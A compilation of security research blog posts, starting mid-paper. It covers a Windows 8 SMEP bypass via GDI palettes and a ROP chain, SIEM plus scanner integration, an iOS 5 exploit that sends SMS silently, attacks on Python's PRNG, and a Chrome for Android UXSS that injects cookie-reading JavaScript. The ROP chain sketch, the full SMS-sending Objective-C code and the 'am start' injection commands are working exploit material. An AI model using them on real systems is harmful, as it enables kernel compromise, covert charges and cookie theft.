        The most convenient object for this purpose is a GDI palette object. It is created with the CreatePalette() function and a supplied LOGPALETTE structure. This structure contains an array of PALETTEENTRY structures that define the color and usage of each entry in the logical palette [5]. The point is that, unlike the other GDI functions that create various objects, there is no parameter validation for this palette. Attackers can store any colors they want in their palette — and therefore any shellcode bytes. The kernel address of the palette object can be revealed through the shared GDI handle table. The contents of the palette are stored at some offset (0x54 in our case). It is not necessary to know this offset exactly, because the shellcode can be placed in the middle of a NOP sled.
A schematic view of SMEP bypass is presented on Figure 1.


Figure 1. Schema of SMEP bypass in Windows 8 x86

        
A palette object provides enough space to store a big shellcode. But in fact, all an attacker needs is to disable SMEP. That is easily done by resetting bit 20 of the CR4 control register, after which a shellcode stored in user-mode memory can be executed without any size limit.

        Of course, there are some limitations when using the paged session pool. Firstly, it is pageable, so we need to consider the IRQL when exploiting a particular kernel-mode vulnerability. Secondly, the session pool is mapped per user session, so we also have to consider the current session. And thirdly, in a multiprocessor environment, control registers are per-core, so an attacker has to use thread affinity to disable SMEP on the right processor core.


4.2.     Other SMEP bypassing attack vectors


        As mentioned before, return-oriented programming can be successfully used to bypass SMEP, because this approach does not necessarily require storing a custom shellcode: it reuses pieces of code that already exist somewhere in kernel memory.
        There is also the option of abusing custom OEM drivers that are not aware of NX-compatible kernel pools.


5.    Conclusion


        In this paper we have reviewed the functioning of SMEP and its software support in Windows 8. We have also shown how it can be bypassed in certain cases because of Windows kernel address-space information disclosure and partial application of the security features. Still, the way SMEP is implemented in the x64 version of Windows 8 is reliable and can successfully be used to prevent various attacks exploiting kernel-mode vulnerabilities.

6.    Future work


        Future work is related to inspecting custom driver modules that still use executable pools, and to finding effective kernel information disclosures that can be used for exploiting such drivers. This is currently considered the most promising direction for research into SMEP bypass methods.





References

[1] Intel: Intel® 64 and IA-32 Architectures Developer's Manual: Combined Volumes. Intel Corporation, 2012.
[2] Mateusz "j00ru" Jurczyk: Windows Security Hardening Through Kernel Address Protection. http://j00ru.vexillium.org/blog/04_12_11/Windows_Kernel_Address_Protection.pdf
[3] Mateusz "j00ru" Jurczyk, Gynvael Coldwind: SMEP: What is it, and how to beat it on Windows. http://j00ru.vexillium.org/?p=783
[4] Ken Johnson, Matt Miller: Exploit Mitigation Improvements in Windows 8. Slides, Black Hat USA 2012.
[6] Feng Yuan: Windows Graphics Programming: Win32 GDI and DirectDraw®. Prentice Hall PTR, 2000.
[7] Mark Russinovich, David A. Solomon, Alex Ionescu: Windows® Internals: Including Windows Server 2008 and Windows Vista, Fifth Edition. Microsoft Press, 2009.


Bypassing Intel SMEP on Windows 8 x64 Using Return-oriented Programming

Authors: Artem Shishkin, Ilya Smit (Positive Research)

This article presents a way to bypass the Intel SMEP security feature on the x64 version of Windows 8 using return-oriented programming. A way to build a suitable ROP chain is demonstrated below.

SMEP disallows executing code from a user-mode page in supervisor mode (CPL = 0). Any attempt to do so on Windows 8 ends up with a blue screen of death with the bugcheck code “ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY”. For more details on how SMEP is implemented in Windows 8, please refer to [1].

In order to disable SMEP, the 20th bit of the CR4 register has to be cleared. There are two steps to bypassing SMEP: first, we need to find out the current value of CR4, and second, we need a way to load a new value into CR4. The first step is needed because we have to preserve the original values of the other CR4 bits. Various bits of this register are responsible for enabling or disabling particular processor features; the OS enables those features only once during system startup, and they are not supposed to be modified at runtime. Modifying arbitrary bits of CR4 can lead to undefined behavior or a system crash.

A preliminary requirement for a successful attack on SMEP is making the shellcode (or the ROP chain, in our case) dynamic; that is, all of the needed code offsets have to be calculated at runtime. This requires a certain kernel-mode information disclosure, e.g., for determining the base address of the module containing the ROP gadgets [2]. Code for parsing the PE file format is also needed, to ensure that the found gadgets are located in the executable section of the exploited module.

There are two approaches to getting the value of the CR4 register. The first one uses a ROP chain. A suitable function, KiSaveInitialProcessorControlState(), is present in the “ntoskrnl” module; its body is provided below.
KiSaveInitialProcessorControlState():
mov     rax, cr0
mov     [rcx], rax
mov     rax, cr2
mov     [rcx+8], rax
mov     rax, cr3
mov     [rcx+10h], rax
mov     rax, cr4
mov     [rcx+18h], rax
mov     rax, cr8
mov     [rcx+0A0h], rax
sgdt    fword ptr [rcx+56h]
sidt    fword ptr [rcx+66h]
str     word ptr [rcx+70h]
sldt    word ptr [rcx+72h]
stmxcsr dword ptr [rcx+74h]
retn
Listing 1. KiSaveInitialProcessorControlState() function

As we can see, this function can be successfully used to retrieve all kinds of interesting information about the processor control state. It is also not guarded with stack cookies and uses only the volatile registers RAX and RCX.

That’s grand!

We can fill in the values of the RAX and RCX registers using another ROP gadget, for example the one at the end of the HvlEndSystemInterrupt() function shown in Listing 2.
HvlEndSystemInterrupt():

pop     rdx
pop     rax
pop     rcx
retn
 Listing 2. HvlEndSystemInterrupt() function ROP gadget

The problem with this method is that it depends heavily on the situation: in certain cases it is difficult to restore the original control flow of the exploited program. In our case, we also need to clear the 20th bit of the retrieved CR4 value, but no suitable ROP gadget for that can be found in the “ntoskrnl” module, so some user-mode code would have to be executed — which is impossible while SMEP is still enabled. However, you can look for a suitable ROP gadget in other loaded modules at runtime.

The other approach is to emulate the initialization of the CR4 register. Most of the bits in CR4 correspond to processor features reported by the “cpuid” instruction, so a plausible value can be reconstructed from it. This method is more convenient, although less reliable.

The second step of bypassing SMEP is using a gadget that loads the new value into CR4. The KiConfigureDynamicProcessor() function can be used for that.
KiConfigureDynamicProcessor():

mov     cr4, rax
add     rsp, 28h
retn
Listing 3. KiConfigureDynamicProcessor() function ROP gadget

Once SMEP is disabled, we can jump to the user-mode buffer with the shellcode. Luckily, there is no stack-cookie protection in the functions containing the exploited ROP gadgets. An obvious mitigation follows: adding stack-cookie protection to these functions would significantly complicate SMEP bypass via a ROP chain.
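To make the chain layout concrete, here is a sketch in Python of how the attacker's stack could be packed for the second approach. Every address is hypothetical and would be resolved at runtime from the loaded module, and the five padding qwords correspond to the "add rsp, 28h" in Listing 3:

import struct

# Hypothetical runtime-resolved addresses (illustrative only).
POP_RDX_RAX_RCX_RET = 0xFFFFF80000100000  # gadget from Listing 2
MOV_CR4_RAX_RET     = 0xFFFFF80000200000  # gadget from Listing 3
SHELLCODE_ADDR      = 0x0000000000410000  # user-mode buffer, runnable once SMEP is off

new_cr4 = 0x1406F8 & ~(1 << 20)           # example CR4 value with the SMEP bit cleared

chain = struct.pack(
    "<11Q",
    POP_RDX_RAX_RCX_RET,   # the hijacked ret lands here first
    0,                     # -> rdx (junk)
    new_cr4,               # -> rax (value destined for CR4)
    0,                     # -> rcx (junk)
    MOV_CR4_RAX_RET,       # mov cr4, rax ; add rsp, 28h ; ret
    0, 0, 0, 0, 0,         # 0x28 bytes skipped by "add rsp, 28h"
    SHELLCODE_ADDR,        # final ret jumps to the user-mode shellcode
)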


References:

[1] Artem Shishkin: Intel SMEP overview and partial bypass on Windows 8.
http://blog.ptsecurity.com/2012/09/intel-smep-overview-and-partial-bypass.html
[2] Mateusz “j00ru” Jurczyk: Windows Security Hardening Through Kernel Address Protection. http://j00ru.vexillium.org/blog/04_12_11/Windows_Kernel_Address_Protection.pdf


SIEM + scanner. Headache Pills?

Security systems are developed and adjusted to new threats all the time. The number of information resources from which data on the current security state arrives grows day by day. However, if you fail to detect and prevent threats in a timely manner, even hundreds of intrusion detection systems will be useless. This is where SIEM (Security Information and Event Management) systems come to help; they are the focus of this article.

What is SIEM?

The SIEM system fulfills the following tasks:

  • Consolidation and storage of event logs from various resources — network devices, applications, OS logs, protection tools. Any information security standard includes technical requirements on event collection and analysis, and they are needed not only to satisfy the standard. There are situations when an incident is noticed too late, the events were erased long ago or the event logs are unavailable, and it is effectively impossible to find out the reasons for the incident. Moreover, connecting to each resource and viewing the events takes too much time; without event analysis there is a risk of learning about an incident in your company from the news.
  • Provision of tools for event analysis and incident investigation. Event formats differ between resources, and plain text at huge volumes is too tiresome and reduces the chance of detecting an incident. Some SIEM-class products unify events and make them more readable, while the interface visualizes only the important information, focuses attention on it, and allows filtering out non-critical events.
  • Correlation and processing according to rules. An incident cannot be judged by a single event. The simplest example is "login failed": one such event means nothing, but three or more with the same account may already indicate brute-force attempts. In the simplest case, rules in SIEM are RBR (Rule Based Reasoning): a set of conditions, triggers, counters, and an action script (a minimal sketch of such a rule follows this list).
  • Automatic notification and incident management. The primary task of SIEM is not only to collect events, but to automate the process of detecting and registering incidents in its own log or an external HelpDesk system, and to report them in a timely manner.
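A minimal sketch of the "login failed" rule mentioned in the list (the event format, threshold, and time window are illustrative):

from collections import defaultdict, deque

WINDOW = 60.0   # seconds
THRESHOLD = 3   # failed logins per account within the window

failures = defaultdict(deque)

def on_event(event):
    """Feed normalized events in; report an incident on a threshold breach."""
    if event["type"] != "login_failed":
        return
    q = failures[event["account"]]
    q.append(event["ts"])
    while q and event["ts"] - q[0] > WINDOW:
        q.popleft()
    if len(q) >= THRESHOLD:
        print("INCIDENT: possible brute force against", event["account"])

for ts in (1.0, 10.0, 20.0):
    on_event({"type": "login_failed", "account": "admin", "ts": ts})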

SIEM is able to detect:

  • Network attacks in the internal and external perimeter
  • Virus epidemics or individual virus infections, unremoved viruses, backdoors, and trojans
  • Unauthorized attempts to access confidential information
  • Fraud
  • Errors and failures in the operation of information systems
  • Vulnerabilities
  • Configuration errors in protection tools and information systems

The SIEM system is multipurpose thanks to its logic. However, for its tasks to be solved, it needs useful event sources and correlation rules. Any information about an event (for instance, that the door of a particular room has been opened) can be sent to the SIEM system and put to use.

Resources are selected on the basis of the following factors:

  • Severity of the system (value, risks) and of the information it processes and stores
  • Reliability and informativeness of the event sources
  • Coverage of information channels (not only the external but also the internal network perimeter should be taken into account)
  • The IT and IS tasks to be solved (ensuring continuity, incident investigation, policy compliance, information leakage prevention, etc.)

Primary SIEM resources

  • Access control and authentication systems — to monitor access to information systems and the use of privileges
  • Event logs of servers and workstations — to monitor access, ensure continuity, and comply with information security policies
  • Active network equipment — change control, access control, network traffic counters
  • IDS/IPS — notifications about network attacks, configuration changes, and device access
  • Antivirus protection — notifications about software health, malware, and changes to databases, configurations, and policies
  • Vulnerability scanners — inventory of assets, services, software, and vulnerabilities; provision of inventory data and the topology
  • GRC systems — for recording risks, threat severity, and incident prioritization
  • Other systems of protection and IS policy compliance (DLP, antifraud, device control, etc.)
  • Inventory and asset management systems — to monitor and detect new infrastructure assets
  • Netflow and traffic control systems

The SIEM solution usually consists of several components:

  • Agents installed on the monitored information systems (essential for operating systems; an agent is a resident program (service, daemon) that collects event logs locally and transfers them to the server when possible).
  • Agent collectors — in fact, modules (libraries) for interpreting a particular event log or system.
  • Server-side collectors intended for preliminary accumulation of events from various resources.
  • A correlation server responsible for collecting information from collectors and agents and processing it in accordance with the correlation rules and algorithms.
  • A database and storage server responsible for storing the event logs.

Event data is collected from the resources either by agents installed on them or remotely (via NetBIOS, RPC, TFTP, or FTP connections). The second option loads both the network and the event source, because some systems cannot transmit only the events that have not yet been transferred and instead send SIEM the whole log, often weighing hundreds of megabytes. And deleting the log after each collection is not a proper solution either.

Events should not merely be collected into consolidated storage for use in case of an incident; they must be processed as well. Otherwise, the solution will not justify its costs. Of course, the SIEM toolset saves time during an incident investigation; however, SIEM is meant to detect and prevent threats in a timely manner. To fulfill this task, correlation rules must be composed with the company's relevant risks in mind. These rules are not permanent and should be updated by experts all the time. As with intrusion detection systems, if a rule for detecting a typical threat is not created in time, the attack is likely to succeed. SIEM does have an advantage over IDS: it is possible to specify a general description of symptoms and use baseline statistics to monitor deviations from the normal behavior of information systems and traffic.

SIEM rules vaguely resemble Snort rules: they describe threat criteria and the reaction to them. I gave the simplest example, with failed logins, earlier. A more complicated real-life example might be a failed login to a particular information system, with a user group and remote object name specified. In the case of fraud — the distance between the two places where a bank card was last used within a short time interval (for instance, a client pays for petrol in Moscow, and five minutes later somebody tries to withdraw 5,000 euros in Australia).
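A sketch of such a fraud rule, assuming each card event carries coordinates and a timestamp (the speed threshold is an arbitrary illustration):

import math

MAX_SPEED_KMH = 900.0  # roughly the speed of a passenger jet

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two points on Earth.
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 6371.0 * 2 * math.asin(math.sqrt(a))

def is_impossible_travel(prev, curr):
    """prev/curr: (lat, lon, unix_ts) of consecutive card uses."""
    dist = haversine_km(prev[0], prev[1], curr[0], curr[1])
    hours = max((curr[2] - prev[2]) / 3600.0, 1e-6)
    return dist / hours > MAX_SPEED_KMH

# Moscow, then Sydney five minutes later -- physically impossible.
print(is_impossible_travel((55.75, 37.62, 0), (-33.87, 151.21, 300)))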

Incident registration in SIEM's own or an external HelpDesk system is no less important. First, incidents get documented: once an incident is registered, there must be a person responsible for resolving it within a certain period of time, and no incident will be missed (as happens with email notifications). Second, it provides incident statistics, which helps reveal problems (incidents of the same type, repeating incidents, incidents closed without eliminating the actual cause). The statistics and key indicators may also be used to evaluate the work efficiency of particular employees, IS departments, and protection tools.

SIEM can make the threat detection process completely automated. If such a system is implemented correctly, the IS department reaches a much higher level of service: SIEM allows paying attention only to the most important threats, working with incidents rather than raw events, detecting abnormal behavior and risks, and preventing financial losses.

It is important to realize that SIEM is a tool not only for information security but for IT as a whole. Strong correlation mechanisms can ensure the continuity of IT services and detect outages of information systems, operating systems, and hardware. Moreover, SIEM is an automation tool. The most common example, relevant for the majority of companies, is an IP address conflict. A simple RBR (rule-based) rule can report such an incident long before a user calls, the root cause can be eliminated at a lower cost, and the probable financial losses are therefore reduced.
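The IP conflict case really is that simple. Below is a minimal sketch, assuming normalized ARP or DHCP events with 'ip' and 'mac' fields (an assumption, not a product schema):

def ip_conflicts(events):
    """Yield an incident whenever two MACs claim the same IP address."""
    claimed = {}                                  # ip -> first MAC seen
    for e in events:
        first = claimed.setdefault(e['ip'], e['mac'])
        if first != e['mac']:
            yield {'ip': e['ip'], 'macs': (first, e['mac'])}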

Analyzing how SIEM is actually used, we have to admit that in the majority of cases the work of such systems comes down to consolidating logs from various resources. In effect, only the SIEM hardware and software is used, and if correlation rules have been set up once, they are never updated.

SIEM and (or) vulnerability scanner

Due to some marketing publications, integrators believe in the myth that the whole network perimeter can be protected with a single protection tool. You can often hear questions such as: "Why do you need host IDS if perimeter IDS is enough?", "Why do you want a security scanner if you have SIEM installed?", "What is the use of a vulnerability scanner if IDS safely protects everything?" Let's check how things stand in reality.

SIEM can correlate:

  • A known threat described by correlation rules
  • A threat matching a general template
  • Abnormal behavior deviating from a baseline
  • A deviation from a security policy based on the principle "everything that is not allowed is prohibited" (not possible in all SIEM systems)
  • Cause-effect relations, if correlation algorithms such as CBR (codebook, smart), GBR (graph-based), statistical, or Bayesian ones are used

The last three algorithms are rarely applied in Russia. Not all SIEM systems support these correlation methods, and their use increases the cost of maintaining the system: a qualified specialist is needed to configure them, update them, and keep them working. Of course, there are a lot of false notifications at the beginning, which is why companies very often just disable these detection mechanisms.
It turns out that only the two simplest detection algorithms, with preset threat descriptions, are used. If a threat is new, it will not be detected. A vivid example is the APT (Advanced Persistent Threat) attack on RSA, a SIEM developer that uses its own system.

For these two algorithms to operate properly, threat data must be updated all the time, just as with IDS. As a result, threats are duplicated in IDS and SIEM (but SIEM correlation rules are updated much more rarely than IDS rules). Rule updates for SIEM products are often missing altogether: not every company can afford a qualified analyst for SIEM and its rules, and besides, the market lacks good specialists.

So with a one-time configuration of correlation rules, an incident (for instance, a network attack) will be detected only if it is reported by another protection tool (IDS, for example).

Let's consider one more practical example. When a vulnerability appears, at first it can be revealed only by particular criteria: a software or plug-in version, various configuration parameters. You may know about the vulnerability beforehand, but you will learn how to detect its exploitation only after a bulletin is issued. Of course, an attacker can freely exploit this vulnerability during the whole period, and most security tools will keep silent, because they do not know how to detect attacks exploiting it. Even after updates and remediation techniques have been issued, it is not always possible to fix the vulnerability in a system (think of the effort, the need for testing, and the incompatibility of different systems; sometimes it cannot be eliminated at all). Residual risks accumulate to a dangerous level, but they can and should be controlled.

Integrating a vulnerability scanner with SIEM combines several methods of threat detection and significantly increases the probability of timely detection. For instance, SIEM can detect abnormal behavior through a baseline, but without the information that an asset has a vulnerability, SIEM cannot identify what exactly this abnormal behavior is connected with. With data from a vulnerability scanner, SIEM can conclude that this very vulnerability is being exploited.

With information about vulnerabilities and asset severity from a vulnerability scanner, the SIEM system can prioritize incidents according to their severity. First of all, this allows reacting to the significant incidents that matter to the business.
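A minimal sketch of this prioritization idea (the field names and weights are illustrative assumptions, not any product's schema):

def incident_priority(event, assets):
    """Scale rule severity by asset criticality and known vulnerabilities."""
    asset = assets.get(event['host'], {})
    score = event['severity']                 # 1..10 from the correlation rule
    score *= asset.get('criticality', 1)      # 1..3 from the scanner's inventory
    if event.get('cve') in asset.get('vulns', ()):
        score *= 2                            # likely exploitation of a known hole
    return score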

A vulnerability scanner is an excellent supplier of inventory information for SIEM (software versions and configuration); this information can be used to detect an incident and to find out what caused it. For instance, a swap file parameter was changed by the user company\p_kolya, and the server began restarting frequently. Such a chain is quite typical, and only a SIEM system is able to reveal the cause-effect relation. However, without integration with a vulnerability scanner, you will be looking for the reasons for quite a long time, and your company will suffer financial losses because of the service delay.

Do you know all computers in your network? Do all of them belong to your company? Are all of them provided with security tools in accordance with the security policy? Are these security tools functioning and configured properly?

Using a compliance-checking mechanism embedded in SIEM (for internal policies and high-level standards) without integration with a vulnerability scanner will not give you a complete picture, because very few technical requirements are covered. A vulnerability scanner is intended not only to detect vulnerabilities but also to supply the major part of the controls. You may never receive a virus notification, but that does not mean your antivirus protection functions correctly: you may not even have it. SIEM will never inform you that antivirus software is not installed or that the file protection option is disabled. A vulnerability scanner can provide you with this and much other useful information.

No other source will provide more detailed and complete information about a vulnerability in your system and the possible ways of exploiting it (with regard to the network topology and configuration) than a vulnerability scanner. A vulnerability may be present in a system but remain unexploitable (a network port is closed, a service is stopped, a VLAN is configured on active network equipment, or firewall rules block traffic to that port). Such information reduces residual risks, helps apply resources only to the necessary protection tools, and rules out false incidents.

The configuration management process, so complicated to implement, becomes simple when SIEM and a vulnerability scanner are used together. You can analyze what has changed, who made the changes and when, and automatically evaluate what they have affected. You only need to compose correlation rules in SIEM and configure the parameters of the information forwarded from the scanner; the SIEM system will handle the rest of the logic itself.

Of course, a scanner without SIEM also reduces risks and allows evaluating possible attack vectors. However, continuous asset scanning increases the load on the assets and the network, while a vulnerability can appear in the interval between scans, and the bigger these intervals, the larger the financial risks. SIEM keeps guarding your system within these intervals, and SIEM scripts can force the vulnerability scanner to run and refresh its information as soon as a threat appears.

It is evident that the more effective information sources SIEM has, the more likely it is to detect a threat at the moment it appears. You can use SIEM and a vulnerability scanner separately. However, used together, they significantly minimize the risks with the highest ROI. This article has touched upon only the simplest cases that can be automated; in practice there are many more of them.
Thank you for your attention!

Author: Olesya Shelestova, Positive Research.

Your Flashlight Can Send SMS — One More Reason to Update up to iOS 6

Today I'm not going to tell you how the security system of iOS 5 is organized. We will not gather bits of information using undocumented features either. We'll just send an SMS from an application behind the user's back.

There is too little information describing low-level operations on iOS, and the available bits do not allow seeing the picture as a whole. Many header files are closed source, so the majority of steps are taken blindly. Mac OS X, the mobile platform's ancestor, becomes the main experimental field.

One of the inter-process communication systems in Mac OS is XPC. This system layer was developed for inter-process communication based on the transfer of plist structures via libSystem and launchd. In fact, it is an interface that allows managing processes through the exchange of structures such as dictionaries. iOS 5 inherited this mechanism as well.

You might already see what I am getting at with this introduction. Yes, there are system services in iOS that include tools for XPC communication, and I want to demonstrate working with the daemon responsible for SMS sending. It should be mentioned that the vulnerability is fixed in iOS 6 but is relevant for iOS 5.0 through 5.1.1. Jailbreak, Private Framework, and other illegal tools are not required for its exploitation; only the set of header files from the directory /usr/include/xpc/* is needed.

One of the elements involved in SMS sending in iOS is the system service com.apple.chatkit, whose tasks include the generation, management, and sending of short text messages. For ease of control, it exposes the publicly available communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can generate and send messages without the user's approval.

Well, let's try to create connection.
// Handle for the XPC connection
xpc_connection_t myconnection;

// A dispatch queue to run the connection's event handler on
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);

// Connect to the privileged Mach service of the SMS compose server
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now we have the XPC connection myconnection to the SMS sending service. However, the XPC configuration provides for the creation of suspended connections, so we need to take one more step for the activation.
// Always set an event handler before resuming the connection.
xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event){
    xpc_type_t xtype = xpc_get_type(event);
    if(XPC_TYPE_ERROR == xtype)
    {
        NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    NSLog(@"Received a message event!");
});

// Leave the suspended state
xpc_connection_resume(myconnection);
The connection is activated. At this very moment, iOS 6 would record a message in the phone log saying that this type of communication is forbidden. Now we need to generate a dictionary similar to xpc_dictionary with the data required for sending the message.
// The recipients list is serialized into a binary plist
// (format 200 == NSPropertyListBinaryFormat_v1_0)
NSArray *recipients = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];

NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:recipients format:200 options:0 error:NULL];

// Fill the XPC dictionary expected by the compose server
xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
xpc_connection_send_barrier(myconnection, ^{
    NSLog(@"Message has been successfully delivered");
});
The sound of an SMS sent to a short number.
So, prior to the elimination of this vulnerability in iOS 6, any application could send SMS messages without the user's approval. Apple provided iOS 6 with one more security layer, which prevents connections to the service from a sandbox.

Thank you for your attention!

Author: Kirill Ermakov, Positive Research.

Random Number Security in Python

This is the second article devoted to the vulnerabilities of pseudorandom number generators (PRNG).
A series of publications describing PRNG vulnerabilities, from the basic ones ([1]) to vulnerabilities in the implementations of various programming languages, CMSs, and other software ([2], [3], [4]), has appeared recently.

These publications are popular because PRNGs underlie web application security. Pseudorandom numbers and character sequences are used in web application security for:

  • Generation of various tokens (CSRF tokens, password reset tokens, etc.)
  • Generation of random passwords
  • Generation of CAPTCHA text
  • Generation of session identifiers
The previous article, relying on the research of George Argyros and Aggelos Kiayias ([3]), explained how to guess random numbers in PHP using PHPSESSID and described various methods of reducing pseudorandom number entropy.

Now we are going to consider PRNG in web applications written in the Python language.

SPECIFIC FEATURES OF PYTHON PRNG

Python includes three modules intended for the generation of random/pseudorandom numbers: random, urandom, and _random.

  • _random implements the Mersenne Twister (MT) algorithm ([6], [7]), with a few changes, in C
  • urandom uses external entropy sources (on Windows, CryptGenRandom from the encryption provider) and is implemented in C
  • random is a Python wrapper over the _random module that ties both libraries together and provides two main entry points for pseudorandom number generation: random() and SystemRandom()

RANDOM()

random() uses the MT algorithm (_random), but first of all it tries to seed it with a SEED taken from urandom, which effectively turns the PRNG into an RNG (random number generator). If the urandom call fails (say, /dev/urandom is missing, or the necessary function cannot be called from the advapi32.dll library), int(time.time() * 256) is used as the SEED (which, as you already know, provides weak entropy).

SYSTEMRANDOM()

SystemRandom() calls urandom, which uses external sources for random data generation.
The change to the MT algorithm means that instead of one number based on one of the 624 numbers of the current PRNG state, two numbers are used:

random_random(RandomObject *self)
{
    unsigned long a = genrand_int32(self) >> 5, b = genrand_int32(self) >> 6;
    return PyFloat_FromDouble((a * 67108864.0 + b) * (1.0 / 9007199254740992.0));
}

As opposed to PHP, the generator can be seeded not only with a long value but with any byte sequence (init_by_array() is called). This is exactly what happens when the random module is imported: an external entropy source is used (32 bytes taken from urandom), and if that fails, time() is used instead:

if a is None:
    try:
        a = int.from_bytes(_urandom(32), 'big')
    except NotImplementedError:
        import time
        a = int(time.time() * 256)

PROTECTION

It would seem that these changes, as opposed to PHP, provide sufficient generator entropy even when random.random() is called. Not so bad.

Python frameworks differ from PHP in that Python is started once, together with the web server. It means the state is initialized only once: when the import random command is executed or when random.seed() is called explicitly (which is very rare in web applications). This allows attacking the MT state with the following algorithm:

  • Find a script displaying the value of random.random() (for instance, the error logger in Plone (SiteErrorLog.py) does this: it leads to a page saying "error with number *** is detected", where a random number is displayed).
  • Make a series of consecutive requests and record the random numbers in them. The request numbers are 1, 2, 199, 200, 511, 625.
  • Perform an easy-to-guess action with the 313th request (for example, generate a password reset link).
  • Relying on requests 1 and 199, determine the states state_1[1], state_1[2], state_1[397].
  • Relying on requests 2 and 200, determine the states state_1[3], state_1[398].
  • Relying on request 511, determine state_2[397].
  • Relying on request 625, determine state_3[1].

Accurate state determination depends on the state element index i: for i mod 2 = 0 the entropy is 2^6, for i mod 2 = 1 it is 2^5.
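These entropy figures come from the bits the generator throws away. A single random.random() value exactly encodes the top 27 and 26 bits of two consecutive 32-bit MT outputs (see random_random() above), so only the discarded 5 and 6 low bits per pair remain unknown. A small sketch:

import random

def split_output(x):
    n = int(x * 2**53)        # exact: random.random() returns n / 2**53
    a = n >> 26               # genrand_int32() >> 5  (27 known high bits)
    b = n & (2**26 - 1)       # genrand_int32() >> 6  (26 known high bits)
    return a, b

a, b = split_output(random.random())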

Requests 1, 2, 199, and 200 help determine the states state_1[1], state_1[2], state_1[3], state_1[397], state_1[398], on the basis of which state_2[1] and state_2[2] are generated, and from those the "random" number of request No. 313 is derived. However, the entropy of this number is 2^24 (16M). It is reduced with requests 511 and 625, which help calculate state_2[397] and state_3[1]. This cuts the number of state options down to 2^8, meaning there are only 256 candidates for the "random" number used in request No. 313.

For the attack to succeed, nobody must interfere with the requesting process and change the PRNG state (in other words, the state indexes must be determined correctly). It is also necessary that request No. 1 uses PRNG state elements with indexes not higher than 224; otherwise request No. 200 will use another generator state, which will break the algorithm. The probability of this condition holding is 36%.
That is why an additional task of request No. 625 is to confirm that all previous requests hit the expected states and nobody interfered with the requesting process.

In addition, here is a script that takes the random numbers of the 6 requests as input and generates all possible random numbers of request No. 313 as output.

PRACTICAL APPLICATION

We analyzed several frameworks and web applications written in Python (including Plone and Django). Unfortunately (or maybe fortunately), we couldn't find vulnerable ones among them.

The most promising target is Plone, since random numbers can be displayed in it (SiteErrorLog.py), but the attack runs into the following problem: Plone works under Python 2.7.*, which cuts the last 5 digits when a float is converted with str(). This substantially broadens the number of options to check (involving local brute force plus external requests to the server).
Python 3 does not truncate floats in str(), which makes applications running on it the most vulnerable to such attacks.

Here is a script that takes 6 random numbers as input (initialized by a state with the necessary indexes, for instance, from the test script vuln.py) and generates the possible options of the target random number as output. It takes about an hour on an "average" computer.

Note: this script does not take into account the state element determination error for i mod 2 = 1; that is why its efficiency drops from 36% to 18%.

CONCLUSION

The specific features of framework code execution (on the web server side) allow an attacker to conduct attacks that are impossible or hard to implement against PHP. Following a few simple rules will protect the PRNG (a short sketch follows the list):
  • Use the urandom module or the random.SystemRandom() class.
  • Seed with random.seed() prior to each random.random() call, using a SEED of sufficient entropy (if urandom cannot be used, you can take, for example, the value of md5(time.time()*(int)salt1+str(salt2)) as the SEED, where salt1 and salt2 are initialized during web application installation).
  • Restrict the display of random numbers in your web application (expose only hash values such as md5 of them).
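A minimal sketch of the first and third recommendations (the helper name is ours, purely illustrative):

import hashlib
import random

_sysrand = random.SystemRandom()      # backed by os.urandom, not the shared MT state

def make_token():
    """Draw 128 bits from the OS entropy source and expose only a hash."""
    raw = '%032x' % _sysrand.getrandbits(128)
    return hashlib.md5(raw.encode()).hexdigest()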

LINKS

[1] http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html [ru]
[2] http://jazzy.id.au/default/2010/09/20/cracking_random_number_generators_part_1.html
[3] http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf
[4] http://www.slideshare.net/d0znpp/dcg7812-cryptographyinwebapps-14052863 
[5] http://media.blackhat.com/bh-us-10/presentations/Kamkar/BlackHat-USA-2010-Kamkar-How-I-Met-Your-Girlfriend-slides.pdf
[6] http://en.wikipedia.org/wiki/Mersenne_twister
[7] http://jazzy.id.au/default/2010/09/22/cracking_random_number_generators_part_3.html 

Google Chrome for Android — UXSS and Credential Disclosure

Here we go.
In July 2011, Roee Hay and Yair Amit from the IBM Research Group found a UXSS vulnerability in the default Android browser. This bug allows a malicious application to inject JavaScript code into the context of an arbitrary domain, steal cookies, or do other evil things. The bug was fixed in Android 2.3.5.

On June 21, 2012, Google Chrome for Android was released, and I found some interesting bugs in it. Just have a look.

UXSS

As expected, the main Chrome activity isn't affected by this vulnerability. However, let’s view the AndroidManifest.xml file from Chrome .apk.


You can see that the class com.google.android.apps.chrome.SimpleChromeActivity can be called from another application, since the corresponding directive is declared for it in the manifest.

Decompile classes.dex from apk and look at the SimpleChromeActivity class.


The onCreate method provided above shows that a new URL will be loaded in the current tab without opening a new tab.

There are a couple of ways to start this activity: via the Android API or via the Activity Manager. Calls through the Android API are a bit complicated, so I used the "am" command from the adb shell.

shell@android:/ $ am start -n com.android.chrome/com.google.android.apps.chrome.SimpleChromeActivity -d 'http://www.google.ru'


There is also a non-security problem with content displaying here. As we can judge by the title, Chrome loaded www.google.ru in SimpleChromeActivity instead of Main, and this activity has access to the Chrome cookies database. The next step is injecting JavaScript code.

shell@android:/ $ am start -n com.android.chrome/com.google.android.apps.chrome.SimpleChromeActivity -d 'javascript:alert(document.cookie)'


